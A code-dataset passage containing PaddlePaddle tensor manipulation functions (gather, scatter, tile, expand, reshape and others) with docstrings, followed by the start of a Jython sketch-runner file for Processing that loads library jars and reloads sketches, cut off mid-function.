    if axis is None:
        axis = []
    else:
        axis = [axis]
    attr_dtype = convert_np_dtype_to_dtype_(dtype)
    if in_dygraph_mode():
        # The op always produces all four outputs; the requested subset is
        # assembled below in the fixed order (out, indices, inverse, counts).
        out, inverse, indices, counts = core.ops.unique(
            x, 'dtype', attr_dtype, 'return_index', return_index,
            'return_inverse', return_inverse, 'return_counts', return_counts,
            'axis', axis, "is_sorted", True)
        outs = [out]
        if return_index:
            outs.append(indices)
        if return_inverse:
            outs.append(inverse)
        if return_counts:
            outs.append(counts)
        # A single requested output is returned bare, not as a 1-tuple.
        if len(outs) == 1:
            return outs[0]
        return tuple(outs)
    check_variable_and_dtype(x, "input",
                             ['float32', 'float64', 'int32', 'int64'], 'unique')
    check_type(return_index, 'return_index', bool, 'unique')
    check_type(return_inverse, 'return_inverse', bool, 'unique')
    check_type(return_counts, 'return_counts', bool, 'unique')
    check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique')
    if len(axis) != 0:
        check_type(axis[0], 'axis', int, 'unique')
    helper = LayerHelper('unique', **locals())
    attrs = {
        'dtype': attr_dtype,
        "return_index": return_index,
        "return_inverse": return_inverse,
        "return_counts": return_counts,
        "axis": axis,
        "is_sorted": True
    }
    # All four outputs are created unconditionally; stop_gradient marks
    # them as non-differentiable.
    out = helper.create_variable_for_type_inference(
        dtype=x.dtype, stop_gradient=True)
    indices = helper.create_variable_for_type_inference(
        dtype=attr_dtype, stop_gradient=True)
    inverse = helper.create_variable_for_type_inference(
        dtype=attr_dtype, stop_gradient=True)
    counts = helper.create_variable_for_type_inference(
        dtype=attr_dtype, stop_gradient=True)
    outputs = {
        "Out": out,
        "Indices": indices,
        "Index": inverse,
        "Counts": counts
    }
    # Same subset-selection logic as the dygraph branch above.
    outs = [out]
    if return_index:
        outs.append(indices)
    if return_inverse:
        outs.append(inverse)
    if return_counts:
        outs.append(counts)
    helper.append_op(
        type="unique", inputs={"X": x}, attrs=attrs, outputs=outputs)
    if len(outs) == 1:
        return outs[0]
    return tuple(outs)
def unsqueeze(x, axis, name=None):
    """
    :alias_main: paddle.unsqueeze
    :alias: paddle.unsqueeze, paddle.tensor.unsqueeze, paddle.tensor.manipulation.unsqueeze

    Insert size-1 dimensions into the shape of ``x`` at the positions given
    by ``axis``. Axis indices refer to positions in the *output* tensor.

    Args:
        x (Tensor): Tensor to unsqueeze. Supported dtypes: float32, float64,
            bool, int8, int32, int64.
        axis (int|list|tuple|Tensor): Where to insert the new dimensions;
            dtype ``int32``. A list/tuple may hold ints or shape-[1]
            Tensors; a Tensor argument must be 1-D. Negative values behave
            like ``axis + ndim(x) + 1``.
        name (str|None): See :ref:`api_guide_Name`. Default: None.

    Returns:
        Tensor: The unsqueezed tensor, same dtype as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            x = paddle.rand([5, 10])
            print(x.shape)  # [5, 10]
            out1 = paddle.unsqueeze(x, axis=0)
            print(out1.shape)  # [1, 5, 10]
            out2 = paddle.unsqueeze(x, axis=[0, 2])
            print(out2.shape)  # [1, 5, 1, 10]
    """
    # Thin wrapper: the fluid layer handles all axis forms directly.
    return layers.unsqueeze(x, axis, name)
def gather(x, index, axis=None, name=None):
    """
    Output is obtained by gathering entries of ``axis``
    of ``x`` indexed by ``index`` and concatenate them together.

    .. code-block:: text

        Given:
            x = [[1, 2],
                 [3, 4],
                 [5, 6]]
            index = [1, 2]
            axis=[0]
        Then:
            out = [[3, 4],
                   [5, 6]]

    Args:
        x (Tensor): The source input tensor with rank>=1. Supported data type is
            int32, int64, float32, float64 and uint8 (only for CPU),
            float16 (only for GPU).
        index (Tensor): The index input tensor with rank=1. Data type is int32 or int64.
        axis (Tensor|int, optional): The axis of input to be gathered, it's can be int or a Tensor with data type is int32 or int64. The default value is None, if None, the ``axis`` is 0.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        output (Tensor): The output is a tensor with the same rank as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            input = paddle.to_tensor([[1,2],[3,4],[5,6]])
            index = paddle.to_tensor([0,1])
            output = paddle.gather(input, index, axis=0)
            # expected output: [[1,2],[3,4]]
    """
    if axis is None:
        axis = 0
    # The op takes the axis as a tensor input; a plain int is materialized
    # as a shape-[1] int64 constant pinned to the CPU.
    axis_tensor = axis
    if not isinstance(axis, Variable):
        with device_guard("cpu"):
            axis_tensor = fill_constant(shape=[1], dtype='int64', value=axis)
    if in_dygraph_mode():
        return core.ops.gather(x, index, axis_tensor)
    check_variable_and_dtype(
        x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
        'gather')
    check_variable_and_dtype(index, 'index', ['int32', 'int64'], 'gather')
    # axis may still be either form here; validate whichever was passed.
    if isinstance(axis, Variable):
        check_variable_and_dtype(axis, 'axis', ['int32', 'int64'], 'gather')
    else:
        check_type(axis, 'axis', (int), 'gather')
    helper = LayerHelper('gather', **locals())
    dtype = helper.input_dtype()
    out = helper.create_variable_for_type_inference(dtype)
    helper.append_op(
        type="gather",
        inputs={"X": x,
                "Index": index,
                "Axis": axis_tensor},
        outputs={"Out": out})
    return out
def unbind(input, axis=0):
    """
    :alias_main: paddle.tensor.unbind
    :alias: paddle.tensor.unbind,paddle.tensor.manipulation.unbind

    Removes a tensor dimension, then split the input tensor into multiple sub-Tensors.

    Args:
        input (Variable): The input variable which is an N-D Tensor, data type being float32, float64, int32 or int64.
        axis (int32|int64, optional): A scalar with type ``int32|int64`` shape [1]. The dimension along which to unbind. If :math:`axis < 0`, the
            dimension to unbind along is :math:`rank(input) + axis`. Default is 0.

    Returns:
        list(Variable): The list of segmented Tensor variables.

    Example:
        .. code-block:: python

            import paddle
            # input is a variable which shape is [3, 4, 5]
            input = paddle.fluid.data(
                name="input", shape=[3, 4, 5], dtype="float32")
            [x0, x1, x2] = paddle.tensor.unbind(input, axis=0)
            # x0.shape [4, 5]
            # x1.shape [4, 5]
            # x2.shape [4, 5]
            [x0, x1, x2, x3] = paddle.tensor.unbind(input, axis=1)
            # x0.shape [3, 5]
            # x1.shape [3, 5]
            # x2.shape [3, 5]
            # x3.shape [3, 5]
    """
    helper = LayerHelper("unbind", **locals())
    check_type(input, 'input', (Variable), 'unbind')
    dtype = helper.input_dtype()
    check_dtype(dtype, 'unbind', ['float32', 'float64', 'int32', 'int64'],
                'unbind')
    # BUG FIX: convert NumPy scalar axes *before* the int type check. The
    # original checked `isinstance(axis, int)` first, so NumPy integers
    # (which are np.generic but not int) always raised TypeError and the
    # conversion branch was unreachable. Also, np.asscalar() was removed
    # from NumPy (deprecated 1.16, removed 1.23); ndarray.item() is the
    # documented replacement.
    if isinstance(axis, np.generic):
        axis = axis.item()
    if not isinstance(axis, int):
        raise TypeError("The type of 'axis' must be int, but received %s." %
                        (type(axis)))
    input_shape = input.shape
    # Normalize a negative axis, then read how many slices to produce.
    axis_ = axis if axis >= 0 else len(input_shape) + axis
    num = input_shape[axis_]
    outs = [
        helper.create_variable_for_type_inference(dtype=helper.input_dtype())
        for i in range(num)
    ]
    helper.append_op(
        type="unbind",
        inputs={"X": input},
        outputs={"Out": outs},
        attrs={"axis": axis})
    return outs
def scatter(x, index, updates, overwrite=True, name=None):
    """
    **Scatter Layer**

    Output is obtained by updating the input on selected indices based on updates.

    .. code-block:: python

        # pseudo-code of the computation:
        import numpy as np
        x = np.array([[1, 1], [2, 2], [3, 3]])
        index = np.array([2, 1, 0, 1])
        updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
        overwrite = False
        if not overwrite:
            for i in range(len(index)):
                x[index[i]] = np.zeros((2))
        for i in range(len(index)):
            if (overwrite):
                x[index[i]] = updates[i]
            else:
                x[index[i]] += updates[i]
        # output: np.array([[3, 3], [6, 6], [1, 1]]), shape [3, 2]

    **NOTICE**: The order in which updates are applied is nondeterministic,
    so the output will be nondeterministic if index contains duplicates.

    Args:
        x (Tensor): The input N-D Tensor with ndim>=1. Data type can be float32, float64.
        index (Tensor): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates's length, and the value in index cannot exceed input's length.
        updates (Tensor): update input with updates parameter based on index. shape should be the same as input, and dim value with dim > 1 should be the same as input.
        overwrite (bool): The mode that updating the output when there are same indices.
            If True, use the overwrite mode to update the output of the same index,
            if False, use the accumulate mode to update the output of the same index. Default value is True.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        Tensor: The output is a Tensor with the same shape as x.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            x = paddle.to_tensor([[1, 1], [2, 2], [3, 3]], dtype='float32')
            index = paddle.to_tensor([2, 1, 0, 1], dtype='int64')
            updates = paddle.to_tensor([[1, 1], [2, 2], [3, 3], [4, 4]], dtype='float32')
            output1 = paddle.scatter(x, index, updates, overwrite=False)
            # [[3., 3.], [6., 6.], [1., 1.]]
            output2 = paddle.scatter(x, index, updates, overwrite=True)
            # [[3., 3.], [4., 4.], [1., 1.]]  (GPU result may differ for
            # duplicated indices -- see NOTICE above)
    """
    if in_dygraph_mode():
        return core.ops.scatter(x, index, updates, 'overwrite', overwrite)

    # Name the checked argument 'x' (not 'dtype') so dtype-mismatch error
    # messages point at the actual parameter.
    check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'scatter')
    check_type(overwrite, 'overwrite', bool, 'scatter')
    helper = LayerHelper('scatter', **locals())
    out = helper.create_variable_for_type_inference(x.dtype)
    helper.append_op(
        type="scatter",
        inputs={"X": x,
                "Ids": index,
                "Updates": updates},
        attrs={'overwrite': overwrite},
        outputs={"Out": out})
    return out
def scatter_nd_add(x, index, updates, name=None):
    """
    **Scatter_nd_add Layer**

    Output is obtained by applying sparse addition to a single value
    or slice in a Tensor.

    :attr:`x` is a Tensor with ndim :math:`R`
    and :attr:`index` is a Tensor with ndim :math:`K` . Thus, :attr:`index`
    has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
    is a Tensor with ndim :math:`K - 1 + R - Q` and its
    shape is :math:`index.shape[:-1] + x.shape[index.shape[-1]:]` .

    According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
    add the corresponding :attr:`updates` slice to the :attr:`x` slice
    which is obtained by the last one dimension of :attr:`index` .

    .. code-block:: text

        Given:
        * Case 1:
            x = [0, 1, 2, 3, 4, 5]
            index = [[1], [2], [3], [1]]
            updates = [9, 10, 11, 12]
          we get:
            output = [0, 22, 12, 14, 4, 5]
        * Case 2:
            x = [[65, 17], [-14, -25]]
            index = [[], []]
            updates = [[[-1, -2], [1, 2]],
                       [[3, 4], [-3, -4]]]
            x.shape = (2, 2), index.shape = (2, 0), updates.shape = (2, 2, 2)
          we get:
            output = [[67, 19], [-16, -27]]

    Args:
        x (Tensor): The x input. Its dtype should be float32, float64.
        index (Tensor): The index input with ndim > 1 and index.shape[-1] <= x.ndim.
            Its dtype should be int32 or int64 as it is used as indexes.
        updates (Tensor): The updated value of scatter_nd_add op, and it must have the same dtype
            as x. It must have the shape index.shape[:-1] + x.shape[index.shape[-1]:].
        name (str|None): The output tensor name. If set None, the layer will be named automatically.

    Returns:
        output (Tensor): The output is a tensor with the same shape and dtype as x.

    Examples:
        .. code-block:: python

            import paddle
            import numpy as np
            x = paddle.rand(shape=[3, 5, 9, 10], dtype='float32')
            updates = paddle.rand(shape=[3, 9, 10], dtype='float32')
            index_data = np.array([[1, 1],
                                   [0, 1],
                                   [1, 3]]).astype(np.int64)
            index = paddle.to_tensor(index_data)
            output = paddle.scatter_nd_add(x, index, updates)
    """
    # Forward the caller-supplied ``name`` instead of discarding it
    # (previously hard-coded to None, so user-provided names were ignored).
    return layers.scatter_nd_add(x, index, updates, name=name)
def chunk(x, chunks, axis=0, name=None):
    """
    Split the input tensor into ``chunks`` equally-sized sub-Tensors along ``axis``.

    Args:
        x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
        chunks (int): The number of sub-Tensors to split ``x`` into along ``axis``.
        axis (int|Tensor, optional): The axis along which to split; an ``int`` scalar or a
            ``Tensor`` with shape [1] and dtype ``int32``/``int64``. A negative value means
            :math:`rank(x) + axis`. Default is 0.
        name (str, optional): Name for the operation. Default None.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        list(Tensor): The list of segmented Tensors.

    Example:
        .. code-block:: python

            import numpy as np
            import paddle

            x = paddle.to_tensor(np.random.random([3, 9, 5]).astype("int32"))
            out0, out1, out2 = paddle.chunk(x, chunks=3, axis=1)
            # each out*.shape is [3, 3, 5]

            # A negative axis counts from the end: axis=-2 is axis 1 here.
            out0, out1, out2 = paddle.chunk(x, chunks=3, axis=-2)
            # each out*.shape is [3, 3, 5]
    """
    # Validate the chunk count, then delegate to the fluid ``split`` op,
    # which implements even splitting when given an integer section count.
    check_type(chunks, 'chunks', int, 'chunk')
    return paddle.fluid.layers.split(
        input=x, num_or_sections=chunks, dim=axis, name=name)
def tile(x, repeat_times, name=None):
    """
    Construct a new Tensor by repeating ``x`` the number of times given by ``repeat_times``.
    After tiling, the value of the i'th dimension of the output is equal to ``x.shape[i]*repeat_times[i]``.
    Both the number of dimensions of ``x`` and the number of elements in ``repeat_times`` should be less than or equal to 6.

    Args:
        x (Tensor): The input tensor, its data type should be bool, float32, float64, int32 or int64.
        repeat_times (Tensor|tuple|list): The number of repeating times. If repeat_times is a list or tuple, all its elements
            should be integers or 1-D Tensors with the data type int32. If repeat_times is a Tensor, it should be an 1-D Tensor with the data type int32.
        name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.

    Returns:
        N-D Tensor. The data type is the same as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            data = paddle.to_tensor([1, 2, 3], dtype='int32')
            out = paddle.tile(data, repeat_times=[2, 1])
            # [[1, 2, 3], [1, 2, 3]]
            out = paddle.tile(data, repeat_times=[2, 2])
            # [[1, 2, 3, 1, 2, 3], [1, 2, 3, 1, 2, 3]]
            repeat_times = paddle.to_tensor([2, 1], dtype='int32')
            out = paddle.tile(data, repeat_times=repeat_times)
            # [[1, 2, 3], [1, 2, 3]]
    """
    if in_dygraph_mode():
        return core.ops.tile(x, 'repeat_times', repeat_times)

    check_type(repeat_times, 'repeat_times', (list, tuple, Variable), 'tile')
    if isinstance(repeat_times, Variable):
        assert len(repeat_times.shape) == 1, (
            'repeat_times must be an 1-D Tensor.')
    else:
        for elem in repeat_times:
            if isinstance(elem, Variable):
                assert len(elem.shape) == 1, (
                    'Elements in repeat_times must be 1-D Tensors or integers.')
            else:
                if six.PY3:
                    type_tuple = (int, np.int32, np.int64)
                elif six.PY2:
                    type_tuple = (int, long, np.int32, np.int64)
                assert isinstance(elem, type_tuple), (
                    'Elements in repeat_times must be 1-D Tensors or integers.')

    check_variable_and_dtype(
        x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'tile')
    if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        # Fixed message typos: "date type" -> "data type", "== True" -> "= True".
        raise ValueError(
            "When the data type is bool for the input 'x' of tile op, you "
            "must set its stop_gradient to be True by "
            "some_var.stop_gradient = True supporting some_var is the input.")

    helper = LayerHelper('tile', **locals())

    inputs = {"X": [x]}
    attrs = {}

    def get_attr_repeat_times(list_repeat_times):
        # Build the static 'repeat_times' attribute: -1 marks a slot whose
        # value comes from a Tensor at runtime.
        attrs_repeat_times = []
        for idx, times in enumerate(list_repeat_times):
            if isinstance(times, Variable):
                attrs_repeat_times.append(-1)
            else:
                attrs_repeat_times.append(times)
                assert times > 0, (
                    "All elements in repeat_times must be positive for tile.")
        return attrs_repeat_times

    if isinstance(repeat_times, Variable):
        repeat_times.stop_gradient = True
        inputs['RepeatTimes'] = repeat_times
        attrs['repeat_times'] = [-1]
    elif isinstance(repeat_times, (list, tuple)):
        attrs['repeat_times'] = get_attr_repeat_times(repeat_times)
        if utils._contain_var(repeat_times):
            # Mixed list of ints and Tensors: also feed the Tensor elements.
            inputs['repeat_times_tensor'] = utils._convert_to_tensor_list(
                repeat_times)

    dtype = helper.input_dtype(input_param_name='x')
    out = helper.create_variable_for_type_inference(dtype)
    helper.append_op(
        type='tile', inputs=inputs, outputs={'Out': out}, attrs=attrs)
    return out
def expand_as(x, y, name=None):
    """
    Expand the input tensor ``x`` to the same shape as the input tensor ``y``.

    Both the number of dimensions of ``x`` and ``y`` must be less than or equal to 6, and the number of dimensions of ``y`` must be greather than or equal to that of ``x``. The dimension to expand must have a value of 1.

    Args:
        x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
        y (Tensor): The input tensor that gives the shape to expand to.
        name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.

    Returns:
        N-D Tensor: A Tensor with the same shape as ``y``. The data type is the same as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            data_x = paddle.to_tensor([1, 2, 3], 'int32')
            data_y = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], 'int32')
            out = paddle.expand_as(data_x, data_y)
            # [[1, 2, 3], [1, 2, 3]]
    """
    if in_dygraph_mode():
        return core.ops.expand_as_v2(x, y)

    check_variable_and_dtype(
        x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand_as')
    check_type(y, 'y', Variable, 'expand_as')
    if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        # Fixed contradictory message: the remedy is setting stop_gradient
        # to True (the check fires when it is False).
        raise ValueError(
            "When the data type of input 'x' for expand_as is bool, "
            "you must set its stop_gradient to be True by "
            "some_var.stop_gradient = True, supporting "
            "some_var as the input 'x'.")

    inputs = {"X": [x], "target_tensor": [y]}

    helper = LayerHelper('expand_as', **locals())
    dtype = helper.input_dtype(input_param_name='x')
    out = helper.create_variable_for_type_inference(dtype)
    helper.append_op(type='expand_as_v2', inputs=inputs, outputs={'Out': out})
    return out
def expand(x, shape, name=None):
    """
    Expand the input tensor to a given shape.

    Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to expand must have a value 1.

    Args:
        x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
        shape (list|tuple|Tensor): The result shape after expanding. The data type is int32. If shape is a list or tuple, all its elements
            should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be an 1-D Tensor with the data type int32.
            The value -1 in shape means keeping the corresponding dimension unchanged.
        name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            paddle.disable_static()
            data = paddle.to_tensor([1, 2, 3], dtype='int32')
            out = paddle.expand(data, shape=[2, 3])
            # [[1, 2, 3], [1, 2, 3]]
    """
    if in_dygraph_mode():
        return core.ops.expand_v2(x, 'shape', shape)

    if isinstance(shape, Variable):
        assert len(shape.shape) == 1, ('shape must be an 1-D Tensor.')
    else:
        for elem in shape:
            if isinstance(elem, Variable):
                assert len(elem.shape) == 1, (
                    'Elements in shape must be 1-D Tensors or integers.')
            else:
                if six.PY3:
                    type_tuple = (int, np.int32, np.int64)
                elif six.PY2:
                    type_tuple = (int, long, np.int32, np.int64)
                assert isinstance(elem, type_tuple), (
                    'Elements in shape must be 1-D Tensors or integers.')

    check_variable_and_dtype(
        x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand')
    check_type(shape, 'shape', (list, tuple, Variable), 'expand')
    if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
        # Fixed contradictory message: the remedy is setting stop_gradient
        # to True (the check fires when it is False).
        raise ValueError("When the data type of input 'x' for expand is bool, "
                         "you must set its stop_gradient to be True by "
                         "some_var.stop_gradient = True, supporting "
                         "some_var as the input.")

    inputs = {"X": [x]}
    attrs = {}
    helper = LayerHelper('expand', **locals())

    def get_attr_expand_shape(list_expand_shape):
        # Build the static 'shape' attribute: -1 marks a slot whose value
        # comes from a Tensor at runtime (or an unchanged dimension).
        attrs_expand_shape = []
        for idx, shape in enumerate(list_expand_shape):
            if isinstance(shape, Variable):
                attrs_expand_shape.append(-1)
            else:
                attrs_expand_shape.append(shape)
                assert shape > 0 or shape == -1, (
                    "All elements in shape of expand must be positive or -1.")
        return attrs_expand_shape

    if isinstance(shape, Variable):
        shape.stop_gradient = True
        inputs['Shape'] = shape
    elif isinstance(shape, (list, tuple)):
        attrs['shape'] = get_attr_expand_shape(shape)
        if utils._contain_var(shape):
            # Mixed list of ints and Tensors: also feed the Tensor elements.
            inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
                shape)

    dtype = helper.input_dtype(input_param_name='x')
    out = helper.create_variable_for_type_inference(dtype)
    helper.append_op(
        type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
    return out
# ``broadcast_to`` is a public alias of ``expand`` kept for API compatibility.
broadcast_to = expand
def reshape(x, shape, name=None):
    """
    Change the shape of ``x`` without changing its data.

    Two special values are accepted inside the target ``shape``:

    * ``-1``: this dimension is inferred from the total element count of ``x``
      and the remaining dimensions; at most one dimension may be ``-1``.
    * ``0``: this dimension is copied from the corresponding dimension of
      ``x``; the index of a ``0`` must not exceed the rank of ``x``.

    For example, with ``x`` of shape ``[2, 4, 6]``:

    * target ``[6, 8]`` yields a 2-D tensor of shape ``[6, 8]``;
    * target ``[2, 3, -1, 2]`` yields shape ``[2, 3, 4, 2]`` (``-1`` inferred);
    * target ``[-1, 0, 3, 2]`` yields shape ``[2, 4, 3, 2]`` (``0`` copied).

    Args:
        x (Tensor): An N-D Tensor. The data type is ``float32``, ``float64``, ``int32``, ``int64`` or ``bool``.
        shape (list|tuple|Tensor): The target shape. The data type is ``int32``. If ``shape`` is a list or tuple,
            its elements should be integers or Tensors with shape [1]. If ``shape`` is a Tensor, it should be an 1-D Tensor.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        Tensor: A reshaped Tensor with the same data type as ``x``.

    Examples:
        .. code-block:: python

            import numpy as np
            import paddle

            x = paddle.rand([2, 4, 6], dtype="float32")
            out = paddle.reshape(x, [-1, 0, 3, 2])
            # out.shape is [2, 4, 3, 2]

            positive_four = paddle.full([1], 4, "int32")
            out = paddle.reshape(x, shape=[positive_four, 12])
            # out.shape is [4, 12]

            shape_tensor = paddle.to_tensor(np.array([8, 6]).astype("int32"))
            out = paddle.reshape(x, shape=shape_tensor)
            # out.shape is [8, 6]
    """
    # Thin wrapper: all validation and op construction live in the fluid layer.
    return paddle.fluid.layers.reshape(x=x, shape=shape, name=name)
def gather_nd(x, index, name=None):
    """
    A high-dimensional extension of :code:`gather` that indexes along several
    axes at once. :attr:`index` is a K-dimensional integer tensor treated as a
    (K-1)-dimensional tensor of index vectors into ``x``, each selecting a
    slice:

    .. math::
        output[(i_0, ..., i_{K-2})] = x[index[(i_0, ..., i_{K-2})]]

    Hence :code:`index.shape[-1] <= x.rank`, and the output has shape
    :code:`index.shape[:-1] + x.shape[index.shape[-1]:]`.

    .. code-block:: text

        Given:
            x = [[[ 0,  1,  2,  3], [ 4,  5,  6,  7], [ 8,  9, 10, 11]],
                 [[12, 13, 14, 15], [16, 17, 18, 19], [20, 21, 22, 23]]]
            x.shape = (2, 3, 4)

        index = [[1]]       -> gathers x[1, :, :]  (a 3x4 slice)
        index = [[0, 2]]    -> gathers x[0, 2, :]  = [8, 9, 10, 11]
        index = [[1, 2, 3]] -> gathers x[1, 2, 3]  = [23]

    Args:
        x (Tensor): The input Tensor which it's data type should be bool, float32, float64, int32, int64.
        index (Tensor): The index input with rank > 1, index.shape[-1] <= x.rank.
            Its dtype should be int32, int64.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        output (Tensor): A tensor with the shape index.shape[:-1] + x.shape[index.shape[-1]:]

    Examples:
        .. code-block:: python

            import paddle
            x = paddle.to_tensor([[[1, 2], [3, 4], [5, 6]],
                                  [[7, 8], [9, 10], [11, 12]]])
            index = paddle.to_tensor([[0, 1]])
            output = paddle.gather_nd(x, index)  # [[3, 4]]
    """
    # Thin wrapper: delegate to the fluid implementation, forwarding ``name``.
    return paddle.fluid.layers.gather_nd(input=x, index=index, name=name)
def strided_slice(x, axes, starts, ends, strides, name=None):
    """
    Produce a slice of ``x`` along multiple axes, similar to numpy basic
    indexing (https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html).

    For each axis listed in ``axes``, the matching entries of ``starts``,
    ``ends`` and ``strides`` define the slice. A negative ``starts``/``ends``
    value :math:`-i` counts from the end of that axis (0 is the initial
    position). A negative stride slices in the reverse direction. A
    ``starts``/``ends`` value larger than the axis length n is clamped to n;
    pass INT_MAX to slice to the end of a dimension of unknown size.
    ``axes``, ``starts``, ``ends`` and ``strides`` must all have equal length.

    .. code-block:: text

        data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]

        Case1: axes=[0, 1], starts=[1, 0], ends=[2, 3],     strides=[1, 1]
               -> result = [ [5, 6, 7], ]
        Case2: axes=[0, 1], starts=[0, 1], ends=[2, 0],     strides=[1, -1]
               -> result = [ [8, 7, 6], ]
        Case3: axes=[0, 1], starts=[0, 1], ends=[-1, 1000], strides=[1, 3]
               -> result = [ [2], ]

    Args:
        x (Tensor): An N-D ``Tensor``. The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
        axes (list|tuple): The data type is ``int32``. Axes that ``starts`` and ``ends`` apply to.
        starts (list|tuple|Tensor): The data type is ``int32``. Starting indices of the corresponding
            axes in ``axes``; a list/tuple of integers or shape-[1] Tensors, or an 1-D Tensor.
        ends (list|tuple|Tensor): The data type is ``int32``. Ending indices, same forms as ``starts``.
        strides (list|tuple|Tensor): The data type is ``int32``. Slice steps, same forms as ``starts``.
        name (str, optional): The default value is None. Normally there is no need for user to set this property.
            For more information, please refer to :ref:`api_guide_Name` .

    Returns:
        Tensor: A ``Tensor`` with the same dimension as ``x``. The data type is same as ``x``.

    Examples:
        .. code-block:: python

            import paddle
            x = paddle.zeros(shape=[3, 4, 5, 6], dtype="float32")
            axes = [1, 2, 3]
            sliced_1 = paddle.strided_slice(
                x, axes=axes, starts=[-3, 0, 2], ends=[3, 2, 4], strides=[1, 1, 1])
            # sliced_1 is x[:, 1:3:1, 0:2:1, 2:4:1]

            minus_3 = paddle.fill_constant([1], "int32", -3)
            sliced_2 = paddle.strided_slice(
                x, axes=axes, starts=[minus_3, 0, 2], ends=[3, 2, 4], strides=[1, 1, 2])
            # sliced_2 is x[:, 1:3:1, 0:2:1, 2:4:2]
    """
    # NOTE(review): ``name`` is accepted for API uniformity but is not
    # forwarded -- presumably the fluid implementation takes no name
    # argument; confirm before changing.
    return paddle.fluid.layers.strided_slice(
        input=x, axes=axes, starts=starts, ends=ends, strides=strides)
| 37.901363
| 457
| 0.555131
|
4a01fa3d7a99cec1fb19a8d40c599f7782f1cbd5
| 2,825
|
py
|
Python
|
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
pycessing/sketch_runner.py
|
kitao/pycessing
|
ab59dfbef7f52712e894f5b4d869c27f68bf3685
|
[
"MIT"
] | null | null | null |
import os
import sys
import settings
import sketch_info
import state_control
import watch_update
import gui
def load_library(name):
lib_dir = os.path.join(settings.COMMAND_LIB, name, 'library')
if load_all_jars(lib_dir):
return True
else:
print 'library not found -- {0}'.format(name)
return False
def load_all_jars(path):
import fnmatch
if not os.path.isdir(path):
return False
is_success = False
for name in os.listdir(path):
if fnmatch.fnmatch(name, '*.jar'):
# sys.path.append(os.path.join(path, name))
load_jar(os.path.join(path, name))
is_success = True
print 'jar file added -- {0}'.format(name)
return is_success
def load_jar(jar_file):
    """Add a single jar (path string or ``java.net.URL``) to the running JVM.

    Works by reflectively calling the protected ``URLClassLoader.addURL``
    on the system class loader -- a well-known Jython trick for extending
    the classpath at runtime.
    """
    import java.io
    import java.net
    import java.lang

    # Accept either a path string or an already-built URL.
    # NOTE(review): File.toURL() is deprecated in Java in favour of
    # File.toURI().toURL() -- confirm against the target JVM before changing.
    url = (java.io.File(jar_file).toURL()
           if type(jar_file) != java.net.URL else jar_file)
    method = java.net.URLClassLoader.getDeclaredMethod('addURL',
                                                       [java.net.URL])
    # Jython bean-property shorthand for method.setAccessible(True),
    # needed because addURL is protected.
    method.accessible = 1
    method.invoke(java.lang.ClassLoader.getSystemClassLoader(), [url])
def complete_path(path):
    """Resolve ``path`` relative to the current sketch's directory."""
    return os.path.join(sketch_info.sketch_dir, path)
def run_app(app):
    """Start a Processing sketch: hand ``app`` to PApplet's runner thread."""
    from processing.core import PApplet
    PApplet.runSketch([app._title], app)
# Module-level flags polled by start()'s watch loop; set from the GUI
# callbacks below to request a sketch reload or a full exit.
_to_reload = False
_to_exit = False


def reload_sketch():
    """GUI callback: request that the running sketch be reloaded."""
    global _to_reload
    _to_reload = True


def exit_sketch():
    """GUI callback: request that the runner terminate."""
    global _to_exit
    _to_exit = True
def start():
    """Entry point: run the sketch named on the command line, reloading it
    whenever one of its source files changes or the GUI requests a reload.
    """
    if len(sys.argv) < 2:
        print 'usage: {0} [sketchfile]'.format(settings.COMMAND_NAME)
        sys.exit()

    sketch_info.init_sketch_info(sys.argv[1])

    if not os.path.exists(sketch_info.filename):
        print 'sketch file not found -- {0}'.format(sketch_info.filename)
